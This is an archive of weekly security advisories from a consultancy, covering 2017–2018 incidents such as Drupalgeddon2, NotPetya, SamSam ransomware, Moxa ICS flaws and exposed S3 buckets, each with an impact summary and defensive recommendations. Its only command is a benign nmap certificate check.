04/23/2018 Attackers Compromising Drupal-based Web Sites En Masse for Financial Gain
Attackers are using two vulnerabilities, including Drupalgeddon2, to compromise Drupal installations, install DDoS and currency-mining malware, and attack non-Drupal machines made accessible by that foothold.

The impact for organizations which run Drupal now (or ran it at any time since March 28th, 2018) is severe. Multiple organized criminal groups have raced to exploit the first vulnerability, named Drupalgeddon2. The most prolific uses malware named “Muhstick,” which infects a host, then spreads to other machines using SSH and WebDav, as well as exploits against the Drupalgeddon2 vulnerability and vulnerabilities in Oracle’s WebLogic, ClipBucket, Webuzo, and the WordPress content management system. Muhstick is a variant of Tsunami, which has infected tens of thousands of Linux hosts. Muhstick has built a botnet from servers and Internet of Things (IoT) “smart devices,” allowing it to scan the Internet for vulnerable hosts very quickly.

For any site that ran Drupal since March 28th, it’s critical to patch the Drupal software immediately. InGuardians further recommends assuming that Internet-facing Drupal installations have been compromised, until that assertion can be ruled out. The Muhstik malware doesn’t spread only using software vulnerabilities. It also scans for SSH servers, trying both a pre-populated set of password possibilities as well as credentials that it finds on the system from which it runs. If Muhstik compromised a single Drupal system, it has likely spread to other systems.

InGuardians has seen many clients use a best practice approach to content management system-provided websites. These clients bifurcate their Drupal application servers into two servers: an internal dynamic server and an external static server. The internal server runs the content management system (Drupal) to allow organization staff to update the site’s content. On any update, this server pushes a static mirror of the site to the external server.  The external server serves content statically, exposing far less code to attackers. This can be accomplished on Drupal using the Static Generator module.

Additionally, InGuardians recommends disallowing root login via SSH and relocating the SSH server port from 22 to a less well-known number. These two measures massively reduce the number of successful SSH-based attacks, whether in initial infection or lateral movement.

Additional Resources
Drupal Patch Instructions for Drupalgeddon2

Drupal Static Generator Module

Botnet Muhstik is Actively Exploiting Drupal CVE-2018-7600 in a Worm Style (Netlab at

Big IoT Botnet Starts Large-Scale Exploitation of Drupalgeddon 2 Vulnerability (Bleeping Computer)

04/16/2018 Researchers Can Hijack ATI Systems’ Emergency Alert Sirens Using Software Defined Radio (SDR)
Security researchers at Bastille Networks were able to capture, analyze and replay packets to trigger emergency alert sirens in the city of San Francisco provided by ATI Systems.  Over a 2 year period, researchers captured the weekly transmission to initiate system tests.  Upon analyzing the captured radio protocol, it was discovered that the transmissions were neither encrypted nor authenticated.

While the ATI Systems emergency alert sirens are a unique implementation, the vulnerability in these systems extends to those installed outside of San Francisco, with identical systems deployed across the globe.  Attacks against these types of systems are not unique, as it is theorized similar attacks were used in the erroneous activation of the Tornado Warning sirens. In Dallas, Texas

Adoption of proprietary Radio Frequency (RF) systems is quite common in both legacy and current systems.
InGuardians often finds that organizations do not have an accurate inventory of RF-enabled systems in their environment, nor do they understand the overall implications of compromise of the unknown RF-enabled systems.

This proof of concept is specific to the ATI Systems implementations, which by design, could cause widespread panic should the emergency sirens be triggered by an attacker.  However, a bad actor or researcher could use the overall methodology and tools for discovering an attack surface for this system on other RF-enabled systems.  Overall impact to an organization will depend on the affected system discovered and analyzed, but it is not outside the realm of possibility that there could be pecuniary or life safety issues.

With the increased development in Software Defined Radio (SDR) and expertise in these tools being gained by the security community, RF protocols that formerly enjoyed “security through obscurity” are unlikely to remain free from attack much longer.  This becomes particularly challenging in legacy systems where the RF protocols were designed with obscurity as the only security measure either due to lack of available technology, or little future consideration in technology advancements.

InGuardians recommends its clients perform or commission an overall discovery of RF-enabled systems in the enterprise environment, followed by a thorough risk analysis. Should the risk impact be determined to be elevated for any of the discovered systems, it is recommended, at a minimum, to contact the vendor to in order to determine methods in use for securing, encrypting, and performing authentication of transmissions.  Should the answers from the vendor be insufficient, or the RF-enabled systems be critical to the operation of the business, a thorough review and analysis of the RF transmissions should be performed.

Additional Resources

Dallas Tornado Siren Hack [Washington Post]

04/09/2018 Security vulnerabilities in two Moxa Industrial Control Systems (ICS) devices

There are security vulnerabilities in two Moxa ICS devices: MXview network management software and the AWK-3131A 802.11n ICS wireless gear.    The management software has a flaw that would allow an attacker to view/retrieve the cryptographic key on the server.  The wireless gear has a flaw that allows an unauthenticated user to execute commands on the system.Impact
The first vulnerability affects Moxa’s AWK-3131A 802.11n ICS wireless network gear.  This was reported initially by Cisco Talos in December 2017, and patched by Moxa on April 3.  The vulnerability is present due to the way Moxa is using ‘loginutils’ to parse failed logins, allowing attackers to use a semicolon to terminate the login and follow it with a command to be executed.  Cisco Talos has stated that it believes the web front end is  also vulnerable to the attacks, as it also uses ‘loginutils’ to parse the failed logins.  The vulnerability was successfully exploited via ‘Telnet’, ‘SSH’, and the local management console.

The second vulnerability is in Moxa’s MXview network management software, and allows an attacker to retrieve the private key for the server.  Obtaining the cryptographic private key would allow the attacker to decrypt files and traffic.  The flaw is considered severe enough for DHS to have issued an advisory on April 5.  This follows a flaw in the same product discovered in January, which allows attackers to use an “unquoted search path” in order to execute code or gain access to files on the server.

First and foremost, it is important to deploy ICS devices on an isolated network segment to ensure that they are not accessible from the Internet.  InGuardians recommends that you deploy ICS networks and devices behind firewalls and other network controls, isolating them from the business network.  InGuardians also recommends performing routine risk assessments to ensure that controls and audit measures are working properly.

As for these specific vulnerabilities, Moxa released patches last week (link in the Additional Resources below).

Additional Resources
DHS advisory:

NCCIC document on recommended practices for securing ICS

* Moxa MXview advisory:

* Moxa MXview site:

* Moxa AWK-3131A

*N.B. the Moxa site is badly designed, with no clear and easy way to view security updates and advisories.

04/02/2018 Drupal CMS High-Critical Remote Code Execution Vulnerability
Security researchers have discovered and publicly released several Highly-Critical Remote Code Execution (RCE) vulnerabilities in Drupal versions 7 through 8.5, as well as the end-of-lifed version 6.  Due to the serious nature of these remote code execution vulnerabilities, Drupal has released patches for older, unsupported versions including version 6.

The Drupal Content Management System (CMS) powers 6% of the 10,000 most popular public web sites. Over 647,000 publicly-accessible web sites use this software. This may increase the risk that bad actors may either quickly attack companies running Drupal or will create and release malware targeting this software.

Remote code execution vulnerabilities like these allow an attacker to execute code of their own choosing on an unpatched installation. This could ultimately result in full system compromise and/or allow the attacker to move laterally to compromise other machines, including those on internal network segments.

InGuardians often finds that organizations do not have an accurate inventory of Internet-facing hosts or the applications which they host.  In these cases, application vulnerabilities are particularly challenging to defend, as it is impossible to update software that isn’t known to the patch management staff.

Unless Drupal CMS versions are updated to 7.58 or 8.51,  it is possible for an attacker to gain full control of the affected system. Drupal CMS version 6 permits the same behavior unless patched against SA-CORE-2018-2. Depending on the attacker’s skillset, as well as the defender’s level of network segmentation, it is possible that an attacker could take full control of the defender’s infrastructure.

InGuardians recommends immediate patching of the Drupal content management system (CMS) across all versions.  Until such time as a patch can be applied, InGuardians recommends that affected organizations restrict access severely to a few trusted IP addresses.  This restriction should only be utilized to perform appropriate upgrades and patches, before restoring full access.

This is also the perfect opportunity to undergo an aggressive look at internet-facing resources in order to develop an accurate inventory, with the intent of finding previously unknown assets including Drupal.  Upon completion of internet-facing asset discovery, InGuardians recommends performing a similar discovery on internal network segments.

Additional Resources 
Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-002
FAQ about [Security Advisory] SA-CORE-2018-002
[Content Management System] CMS Usage Statistics

03/28/2018 Municipal governments battle cyber attacks.

The Georgia cities of Atlanta and Loganville are the latest victims in an ongoing trend of attacks on municipalities. First, on Thursday, March 22nd, the City of Atlanta announced that its networks had been shut down due to a ransomware attack. At the time of this posting, the city is working with the FBI and the Department of Homeland Security, as well as external partners from Microsoft and Cisco’s cybersecurity response team, to investigate the situation.

The City of Loganville (a suburb of Atlanta), announced on Monday, March 26th on its Facebook page that an external threat actor had successfully perpetrated a breach of an internal server. The Loganville breach may not be related to that of Atlanta.

In Atlanta, the ransomware has cut off electronic access to court records, while many departments are using pen and paper to perform their duties. Many city services, such as electronic bill pay, are still unavailable to city residents. As a precautionary measure, the public wireless network (Wi-Fi) at Hartsfield-Jackson airport has also been suspended.

Evidence suggests the Atlanta malware is SamSam, which has been seen in other government targeted attacks, like the one that occurred at Colorado’s state Department of Transportation.  In particular, the letter shared by local media during the early stages of the ransomware infection in Atlanta is clearly a SamSam ransom note.The wording — including typos — is identical to the examples shared by researchers working for Cisco’s Talos group earlier this year. The only difference was the directory where the contact portal is hosted.

Once attribution to SamSam became public knowledge, the SamSam group deleted the contact portal that the city of Atlanta would use to make payment. Given the SamSam group’s actions, it isn’t clear if payment is even possible now. While it is possible other portals exist for the systems infected in Atlanta, the city hasn’t released any technical details to the public.

In Loganville, the breach is believed to have exposed personally identifiable information, (PII) such as social security numbers, to the attacker.

InGuardians echoes the sentiments of the newly elected Atlanta Mayor who is quoted as saying, “this is bigger than a ransomware attack, it’s an attack on government and therefore an attack on all of us.”

It is increasingly apparent that organizations must make the resources available and establish effective policies and preventative measures to strengthen their security postures in order to mitigate these threats.

InGuardians recommends that all leaders of municipal governments view themselves as a likely soft target and create internal Information Security programs to address the emerging threats. We also recommend that all business leaders continue to follow this case for lessons learned, such as:

  • Do not leave Remote Desktop Protocol (RDP), Windows Server Message Block (SMB), Secure Shell (SSH) or Telnet available to the Internet – use VPNs and firewall white lists
  • Confirm that no operations systems use SMB version 1
  • Apply Windows group policy objects (GPOs) to harden government systems uniformly
  • Do not allow users to have local administrative privilege on their desktop machines
  • Make sure that all patches are deployed quickly – malware victims have lost a race with an attacker

Additional Resources

Small Towns Confront Big Cyber Risks (GovTech)

Atlanta Working “Around the Clock” to Fight Off Ransomware Attack (NPR)

We Are a Resilient City – Atlanta Works to Move Forward Following Cyber Attack (11Alive)

Metro Atlanta City Reports Its Own Data Breach (Atlanta Journal Constitution)–politics/metro-atlanta-city-reports-its-own-data-breach-warns-customers/GsK565pH9L8y3GOk0NvERI/

Atlanta’s Computers Crippled by Ransomware – Issues Unresolved After 4 Days (SmartCities Dive)

03/19/2018 New DHS alert on breaches of power grid and other control systems

Disabling safety or security controls invalidate risk assessment and mitigation.  It won’t matter if the control was disabled by a hacker or by an employee.

New information is surfacing about breach of control systems first identified in August 2017.  One conceptual flaw and one implementation or operating error combined to defeat safety systems and shut down systems.

In a SCADA environment, the TRICONEX system is a sound concept, using triple redundancy comparison of signals as a check of proper operating conditions. If one of the 3 is different, the system enters a safety condition with appropriate alerts and changes. That could mean opening vales to increase cooling, or shutting fuel valves to stop machinery. The firmware of the controllers can, of course, be updated.

To ensure security, a physical switch is used to change it from “read only” to “read-write” for updates. A variety of implementation factors, from remote locations to limited personnel managing large automated systems, may have contributed to operators leaving systems in read-write. In at least one case, one of the maintenance management computers was compromised allowing hackers access to now fully modifiable controllers. In another case, the SCADA system was on a larger network and not properly isolated from external connections leaving it vulnerable to external penetration.

Remote network access to systems enabled hackers to destroy hard drives inside the company’s computers and their data was wiped clean. (NYT). It also appears that only an error in the attack code prevented physical damage and possibly explosions.


InGuardians’ clients may be at LOW risk for the specific attacks used against these Industrial Control Systems (ICS).

However, the broader issue of increased risk from “work arounds” which inevitably occur in every business may be negating what you think is in place for risk mitigation. The focus is NOT on malicious employees, but on those trying to succeed in the face of unintended policy conflicts. Too few people required to do detailed checks on too many systems too widely separated or remotely located is only one of the sorts of situations that creep in to daily ops.


Review ACTUAL operating conditions and procedures compared to policy. Third party audits or interdepartmental audit teams provide fresh perspectives.

Think more like an attacker. Be less sure – “my door is locked, I can relax” – and more – “the door has a lock but how would it get picked? Broken? Simply evaded?  If it was picked, how would I know”.  Red Teams don’t simply do set penetration tests, but use creative thinking to find the unexpected gaps, the new approaches. Those attacking your systems don’t have any rules.

Additional Resources




03/12/2018 Dofoil trojan variant used to install cryptocurrency-mining malware
Microsoft’s Windows Defender Research group identified a new variant of the Win32/Dofoil remote access trojan which installed a cryptocurrency miner for Electroneum (ETN) coin.


The impact of this trend is severe, due in part to the trojan’s ability to download and execute code on command.  The Dofoil family of trojans give the attackers full command and control of the compromised system. In addition to crypto mining, the trojan has previously been used to install ransomware and other malicious code.

In this latest attack, Dofoil used a technique known as process hollowing, copying legitimate binaries for explorer.exe and swapping malware in its place.

Many attackers are using cryptocurrency mining as a major revenue stream.  During the WannaCry outbreak, at least two other groups used the same exploits to install crypto miners and subsequently earn millions of dollars (far better than the WannaCry authors fared.)


InGuardians recommends having a robust segmented network, with good instrumentation of inbound and outbound traffic.  Organizations can use network and host monitoring tools that identify unusual behavior and activity to help identify and contain malware outbreaks.  Some of the tools that can be used for detection and containment are Bro, Snort, and Windows Defender. Many anti-malware and threat protection services claim to detect and protect against cryptocurrency miners.

Detection of cryptocurrency miners is typically done by identifying the installation, code injection, or persistence mechanisms, as well as the coin mining itself.  While the miners that we are discussing here are hidden in running processes, there are many implementations of JavaScript miners that run in browsers.

In addition to segmentation and instrumentation, InGuardians recommends having solid backup and recovery solutions in place.  These should be tested on a regular basis, with verification of the recovered systems.

Additional Resources

Win32/Dofoil (Microsoft Windows Defender Security Intelligence)

DoFoil: Crypto-mining Malware Outbreak Infects 500,000 Computers In One Day (Newsweek)

The State of Malicious Crypto-mining (MalwareBytesBlog)

03/05/2018 Widespread SSL Certificate Revocation Disrupting Internet Transport Encryption with Further Disruption Planned for April and October

On Wednesday, Trustico (a Symantec reseller) triggered the revocation of roughly 23,000 SSL/TLS certificates, in advance of April and October’s certificate disruptions on any certificate sold under the brands Symantec, GeoTrust, Thawte, and RapidSSL.

While the April deadline for Symantec, GeoTrust, Thawte and RapidSSL certificates looms, Trustico’s method of revocation has caused further concern. Trustico wanted to move its customers from roughly 50,000 Symantec-provided certificates to new ones provided by Comodo. Digicert, who had purchased Symantec’s certificate business, initially refused, on the basis that it would only revoke so many certificates in the case of a security breach. Trustico’s CEO then e-mailed 23,000 certificates’ private keys without encryption to Digicert, thus creating a breach. The breach was compounded when a remote code execution vulnerability was found in Trustico’s website.

This situation calls into question Trustico’s practices as a certificate reseller. First, certificate vendors should not retain private keys. Second, Trustico’s choice to e-mail private keys put all communications using those keys at risk and may have failed to give customers the opportunity to replace the certificates before this risk window.

Any organization using one of the revoked Trustico-resold Symantec SSL certificate has lost the integrity of HTTPS connections to any server using that certificate. Users will generally see an untrusted connection error  immediately and many will understand that a problem exists. Further, any organization using a Symantec certificate, including those branded as GeoTrust, Thawte and RapidSSL, will face a similar problem on April 17th or in October, at which point Google’s Chrome and Mozilla’s Firefox browsers will begin stating that the certificates are untrusted. See the schedule below (under “Recommendations”) for more detail.

InGuardians strongly recommends that organizations audit their SSL/TLS certificates, determining which have been provided by Symantec, GeoTrust, Thawte and RapidSSL. Staff should replace every certificate provided by these companies well before the following deadlines:

April 17th: Certificates issued before June 1, 2016 will not work with Chrome 66.

May: Certificates issued before June 1, 2016 will not work with Firefox 60.

October: Certificates will no longer be trusted, as of Firefox 63.

October 23rd: Certificates will no longer be trusted, as of Chrome 70.

Organizations can use a number of tools to check its SSL/TLS certificates, whether for its web servers or its other SSL/TLS-enabled services. The popular open source tool, nmap, will display information about the certificate enabled on one or more ports, like so:

nmap -v -sT -p 443 –script=ssl-cert | egrep ‘(Issuer|valid)’
| Issuer: commonName=GeoTrust RSA CA 2018/organizationName=DigiCert Inc/countryName=US/
| Not valid before: 2018-01-25T00:00:00
| Not valid after:  2019-02-24T12:00:00

Organizations should be careful to check all ports on a system, and not just the standard service ports for SSL/TLS.Additional Resources
Google: “Chrome’s Plan to Distrust Symantec Certificates”

Mozilla: “CA:Symantec Issues”

DigiCert: “How do you handle mass revocation requests?”!msg/

Trustico® Abandons Symantec® SSL Certificates

02/26/2018 Increased attacker focus on exposed cloud services, specifically AWS Simple Storage Service (S3) Buckets

Amazon’s cloud-based Simple Storage Service Buckets, colloquially referred to as “S3 Buckets”, have been a recent focus of attackers and security researchers.  With the advent of new open source and publicly-available tools to search for improperly configured S3 buckets, bad actors and information security firms have found many cases where the buckets’ owners have inadvertently granted access to every user on the Internet.
Internet-accessible S3 buckets have multiple risks. In cases of world-wide read-only access, the discoverers have found personally-identifiable information (PII) and other sensitive data. In at least one case of world-wide write access, the discoverer found a production website hosting content directly from the bucket, such that any Internet user could alter the website’s content.  A bad actor could drastically change the overall presentation of the site and would likely add hostile JavaScript code that would run in every visitor’s browser, including key-loggers or crypto-coin mining clients. When discovered, this could ultimately reduce customer faith in the company owning the S3-backed site.
In moving to cloud-hosted services, many organizations have failed to heed widespread warnings with this message:
Organizations must secure and monitor cloud-based services just as strongly as with traditional on-premise infrastructure.


Impact from exposure of Amazon S3 is varied, depending on an organization’s adoption and configuration of Amazon’s cloud-based storage infrastructure:

Known adoption of Amazon S3: The risk level varies from low to critical, depending on individual bucket configuration for read/write access, granularity of defined accesses, types of content stored, and use cases for the stored content. The overall level of risk would be determined by these factors and will be different for each individual bucket within an organization’s cloud infrastructure.

No known adoption of Amazon S3: The current risk is undefined, and merits analysis to identify whether your organization is using S3, and if it is see above.


InGuardians recommends performing a self-assessment of existing S3 Buckets using currently available tools, such as AWSBucketDump and BuckHacker.  Results of these tools should then undergo a thorough inventory and risk analysis.

In addition to these open source tools, Amazon makes the AWS Trusted Advisor tool available to customers with a Business or Enterprise-level support plan. Trusted Advisor can analyze an AWS environment, including its S3 buckets, and make best practice recommendations.

Additional Resources

Tesla Cryptojacked by Currency Miners

AWSBucketDump, an Open Source S3 Bucket Search Tool

BuckHacker, an S3 Search Engine

AWS S3 Documentation: Which Access Control Method Should I Use?

AWS Trusted Advisor

02/20/2018 Theft of Newtek domains is a reminder to stay vigilant

Last week a web services company (Newtek) responsible for hosting over 100,000 e-commerce based websites and email servers had three of its core domains stolen.  These domains originally hosted software that allowed customers of these services to manage their websites.

The attackers then replaced the application that users would normally use to manage their websites with his own application in the form of a live-chat service.  When users logged in, they believed themselves to be chatting with a helpful admin, when in fact they were communicating with the attacker.


The full impact of this is still being determined.  However, corporate email for many of their customers became unavailable, business websites no longer resolved, and sensitive information was most likely communicated to the attacker.


InGuardians recommends that all businesses consider domain hijacking as a potential event in their Business Continuity Plans (BCP).  It’s important to stay vigilant in ensuring continued ownership of domains. It’s also important to have plans to use secondary domains for web and email traffic in the event of having lost ownership of a domain.

InGuardians recommends building your own capabilities to gather counter-intelligence and to proactively monitor your organizations digital footprint.  Consider scripts or services for monitoring DNS changes to the domains that you control.


Wikipedia list these options as a means to prevent an unwanted domain transfer:

  • Use strong email passwords and enable two-factor authentication if available.
  • Disable POP if your email provider is able to use a different protocol.
  • Tick the setting “always use https” under email options.
  • Make sure to renew your domain registration in a timely manner – with timely payments and register them for at least five (5) years.
  • Use a domain-name registrar that offers enhanced transfer protection, i.e., “domain locking” and even consider paying for registry locking.

Additional Resources

02/12/2018 Smart devices add exposure and threat during a breach and are a source of intelligence and forensic data during incident response.
A common challenge in any incident response is figuring out how access was gained, which vulnerability or exploits were used, and how to prevent recurrence. Many breaches are not single events, but the end of a longer series of probes, penetrations, and exfiltrations. The reality is that we are often dealing not with “a breach,” but a series of incidents that can have been going on longer than many realize.

The explosion of smart devices creates many more opportunities not only to reveal information, but for attack vectors. A “phishing” email might be read on an employee’s cell phone and not directly breach a corporate system. But, it might install malware on that phone so the next time it is in WiFi or Bluetooth proximity of a business network the malware starts searching for new opportunities. This shifts what would have been an external penetration to an internal one.

The specific impact to InGuardians customers is relatively low.

The real challenge is in mapping the many additional connections to your networks, and identifying where such connections are logged – if at all. You cannot effectively investigate the cause or source of a breach if you do not have a clear record of the network.

InGuardians recommends regular review of network architecture as it develops, not merely as planned. Systems and connections often grow organically and in creeping increments, and too often expedient solutions are imperfectly documented. It is important to know what the network looks like today, to know where device access logs are stored, and whether they have ever been reviewed.  InGuardians highly recommends robust egress filtering and monitoring.

InGuardians also recommends reviewing the policy for the devices managed by your organization.  Secretary of Defense Mattis is reconsidering DoD’s policies for every personal electronic device that “transmits a two-way signal”.  That’s much more than just cell phones, but you should at least know WHAT you allow.

Additional Resources

02/05/2018 Strava heatmap exposes sensitive military bases invokes the law of unintended consequences.
Something as innocuous as a running application paired with cloud access and GPS location data allowed users to identify sensitive military and government bases and users.  The Guardian newspaper used a script to generate GPS data to upload to a Strava account.  Following this, they used the application to find other users that also do the same run.  The runs matched sensitive locations such as military installations and classified government facilities.  They identified 50 users by name.

With so many interconnecting devices, where is the boundary of your data.  If you don’t know where your data is, and where it goes, you cannot secure it.  With multiple devices providing cloud or syncing functionality, the ease at which data can unintentionally leak out of the environment is astounding.  

Impact from the Strava heatmap to InGuardians customers is relatively low.  The issue does present us with the conundrum of securing our data, performing operational security, and still being able to use that data and the many applications that have become intrinsic to our businesses.   

InGuardians primary recommendation is analyze the potential exfiltration threats that applications pose, and create policy to deal with these accordingly.  Some examples of applications and policies in this arena would be: social media use policy, onsite photography or mobile phone use, or modifying the meta data.

InGuardians also recommends implementing a Mobile Device Management (MDM) solution to enforce policy onto the devices managed by your organization.  Implementing steps in order to lock down functionality on these devices based on your internal processes and policies is critical.  Unknown, unmanaged devices should not be allowed on your network.  The larger concern goes beyond “Strava” and may include data that is gathered but not publicly mapped.

Additional Resources

Strava Heatmap and related articles


07/25/2017 Mac malware (FruitFly) that was detected and patched in January, still making rounds according to BlackHat presenter.

In January, malware that infects Mac OS X was detected impacting organizations performing research in the biomedical field.  This malware leveraged old functions that have been around in OS X for many years.  The main goal of the malware appears to be surveillance, given that it captures screenshots, accesses the webcam, and reportedly performs key logging.

Apple released a patch for this issue in January when the malware was first detected.  Many news outlets are incorrectly reporting that there is no known way to detect this malware.  However, most all major AV companies have signatures to detect FruitFly.

According to the BlackHat presenter, the recent infections appear to be mostly home users.  This is likely due to the fact that all properly licensed versions of OS X have been patched by Apple through a behind-the-scenes update mechanism, as of January.

The impact of this particular issue is low at the moment.

Even with a low impact, the detection of this malware is a reminder to practice good opsec (operational security) and keep built-in webcams covered unless in use.  Also, it is a reminder that even Apple systems can be vulnerable to malware.

InGuardians recommends that organizations ensure that all operating systems are licensed and up-to-date with all relevant security patches.  InGuardians also recommends that organizations endpoint security products to properly monitor all operating systems, including Apple products.

Additional Resources

07/17/2017 Kaspersky anti-virus removed from two GSA Schedules
Kaspersky Anti-Virus (AV) has been removed from two GSA (Government Services Administration) schedules, due to concerns that the Kremlin may use Kaspersky products to compromise US Government computers.

A commonly used anti-virus product has been banned for purchase by any U.S. Government agencies which use GSA schedules 67 and 70.  While the US government has not yet banned Kaspersky products already purchased, or those purchased outside the GSA schedule, the Senate version of the 2018 defense bill places a blanket ban on Kaspersky products.  This bill has not yet been passed.   Many government and private organizations receiving funding from the U.S. or state governments are required to make such purchases via the GSA schedule.


This ban limits further acquisition of Kaspersky AV by those organizations required to follow GSA.  However, many organizations may already have this product entrenched within their infrastructure.  Still, organizations which are not required to adhere to the GSA schedule may decide to follow suit with the GSA’s ban on Kaspersky AV.  Organizations may have many questions on how to move forward.


Hold tight.  There is a significant amount of posturing and saber rattling on the geopolitical stage at the moment.  A number of independent research organizations are currently examining Kaspersky’s software, and reports should be forthcoming.
InGuardians recommends that organizations not rely on solely one vendor’s solutions for security products.  Organizations should evaluate multiple providers and select only those with which they can form a trusted relationship. In the event that trusted relationship becomes compromised, the organizations should have plans for contingencies which enable the removal and selection of a new vendor without losing coverage.  Most of our clients favor endpoint protection, in addition to layered application and network defenses, over traditional anti-virus.

Additional Resources

07/10/2017 DHS & FBI warn of attacks against US energy & manufacturing companies and employees

DHS and the FBI released a TLP:AMBER report warning US energy sector and manufacturing companies about ongoing cyber operations.  These operations include sophisticated physical and cyber attacks, as well as activities targeting employees and operators with the aim of infiltrating air-gapped networks.

Our customers in the energy sector have seen scanning and attacks increase in the last month, but one interesting twist about the report is the targeting of individual employees in order to infiltrate secure networks.  Many details regarding the attacks are now known to the public, in part because an irresponsible organization shared a TLP:AMBER report with the press.  The approach of going after operators and employees to target secure networks is reminiscent of how GHCQ hacked into Belgicom’s NOC.
This warning comes almost one month since Robert Lee and his team at Dragos released their research on the  CRASHOVERRIDE malware, along with ESET’s analysis of Industroyer. Keep in mind that Robert Lee will be presenting details on CRASHOVERRIDE at Black Hat in just a few weeks.

Your key operations and security staff should be trained in operational security (opsec). Include physical security tests and targeting specific roles and personnel as part of your routine security assessments.

Additional Resources

News regarding recent hacking of nuclear plant:

Historical piece on GCHQ targeting Belgicom employees:
07/03/2017 Wiperware disguised as ransomware strikes globally, taking advantage of unpatched systems and flat networks.
The recent wave of supposed ransomware attacks, NotPetya, spread rapidly due to non-segmented (“flat”) networks after its initial infection. It is reported to have first hit the Ukraine and subsequently spread internationally. Many of the targets that reported infection are industrial, financial, health or other components of critical infrastructure.

Whereas the Petya ransomware that first emerged last year was actual ransomware, the variant that wormed its way through non-segmented (“flat”) networks in June 2017 (NotPetya) does not allow for decryption of the data.  As such, InGuardians classifies this as wiperware.

NotPetya uses many different vectors to infect and perform subsequent infections.  Even though it does use the NSA exploits EternalBlue and EternalRomance that were addressed by Microsoft security update MS17-010, NotPetya also leverages many other vectors of attack.  It includes mimikatz, with that tool’s LSADump module.  This is used for recovering passwords with the aim of gaining administrative access locally and eventually at the domain level. NotPetya also uses PSExec as a means of subsequent infection, as well as WMI calls.

Many people responsible for network security claim that they thought they were patched against the NSA exploits. It’s key to note that NotPetya has multiple initial infection vectors, including phishing. Even if one of the NSA exploits became the vector of initial infection on an unpatched machine, the other vectors of subsequent infection allow it to spread unhindered through flat networks, full of otherwise patched systems.

Infections of NotPetya spread rapidly across non-segmented, or “flat,” networks, stealing credentials and leveraging privileges and trust.  The technical result is mangled data on infected systems.  This data is unrecoverable.  The business impact has been a shutdown of operations in many of the impacted targets.

The one common issue that allows the spread of NotPetya is networks that are not segmented with access control.  Logically segmented networks are still considered flat networks, as they lack access controls.  When access controls restrict traffic from traversing network segments, hosts are well isolated and this stymies infections of this type, containing them to a single host or portion of the network.

InGuardians recommends implementing restrictive access controls at the network level and isolating hosts using host-based firewalls or Private VLANs. InGuardians also recommends using Group Policies within Microsoft Active Directory to lock down endpoints and implement the Principle of Least Privilege, preventing the lateral spread from affected, internal systems.  These tactics are highly recommended to defend against modern malware attacks like NotPetya.

Additional Resources
Setting up Private VLANs

Implementing the Principle of Least Privilege within Various Versions of Windows

06/26/2017 Three Drupal updates patch critical vulnerabilities

One of the three critical vulnerabilities patched last week in the Drupal web content management system, allows for remote code execution.

Drupal is one of the most popular content management systems in use, and the vulnerability described in CVE-2017-6920 gives an attacker the same capabilities on the system as Drupal itself.
This vulnerability is in the PECL YAML parser, and is related to a bug found recently in PHP.  PHP updated their documentation alerting developers to not pass unsanitized user input to these functions, which did not “fix” the vulnerability.
Drupal updated their code, changing the way they pass input to the affected functions, and is no longer vulnerable to this attack vector.
YAML parsing vulnerabilities have led to quick widespread exploitation in the past, in multiple web frameworks and languages, and are thus considered quite dangerous.

Recent high profile website hack and defacements emphasize the need to check your content management system implementation and ensure it is up to date.

  • Tactical recommendation: If your organization has deployed Drupal, update to Drupal 8.3.4 or Drupal 7.56, as both branches include the fixes for these vulnerabilities.
  • Strategic recommendation: Consider using a static publishing script to separate your editing/publishing platform from your delivery system. This allows your team to reap the benefits of a content management system, and couples it with the security of a static site. WordPress, Drupal and other popular systems have static publishing plugins or scripts.
Additional Resources
Drupal update:
CVE Entries for the three Drupal vulnerabilities:
Example static publishing plugins:
06/19/2017 Nation states in the ransomware business

Nation states are now confirmed to be using ransomware campaigns to fund state coffers.   British National Cyber Security Center (NCSC) reported this week that the wannacry ransomware attack was launched from North Korea.  This follows the United States National Security Agency (NSA) assessment with the same conclusion.  Security experts believe that the attack was launched by the Lazurus Group tied to the government in Pyongyang.
This revelation further emphasizes the need for full backup, recovery and continuity plans to be tested and refreshed.  While most of our customers have a robust patching, backup and recovery processes in place, we see from news reports the impact wannacry had on critical production networks.  Many organizations have lost their data, or access to critical systems while being locked out during a ransomware attack.  E.G. British National Health Service systems were crippled during the wannacry attack

InGuardians recommends reviewing, testing and validating your patching, and backup/recovery processes.  Incident response capabilities should be tested as well, guided by an internal Red Team exercise designed to emulate the ransomware attack threat model.  InGuardians does not recommend paying for the return of your data.  See link below for new regulations that might impact the practice of paying your way out of ransomware.

Additional Resources

Articles related to this issue:

NIST Incident Response:

Bitcoin regulations to prevent infosec companies from helping organizations pay ransom:

06/12/2017 Powershell scripts execute in Powerpoint without macros

Microsoft’s powerful native scripting language, Powershell, is able to execute inside a Powerpoint presentation without using macros.  This presents an issue for many organizations that rely on blocking macros or documents with macros to minimize the risk of compromise via Microsoft Office documents.


InGuardians RedTeam operators used this very technique to compromise one of our toughest clients just last week.  This is a very real threat posing risk to the information security of your organization.  Determine which controls and audit measures best fit your security posture and move swiftly to lock down this threat vector.


InGuardians recommends first determining if systems need powershell.  If needed, ensure powershell is up to date.  Older versions of powershell do not have many of the security feature set that version 5 has. Take the necessary steps (outlined here: to detect powershell being used offensively on your systems.

Additional Resources

Excellent technical write-up on Powershell Security:

Recent article on this threat: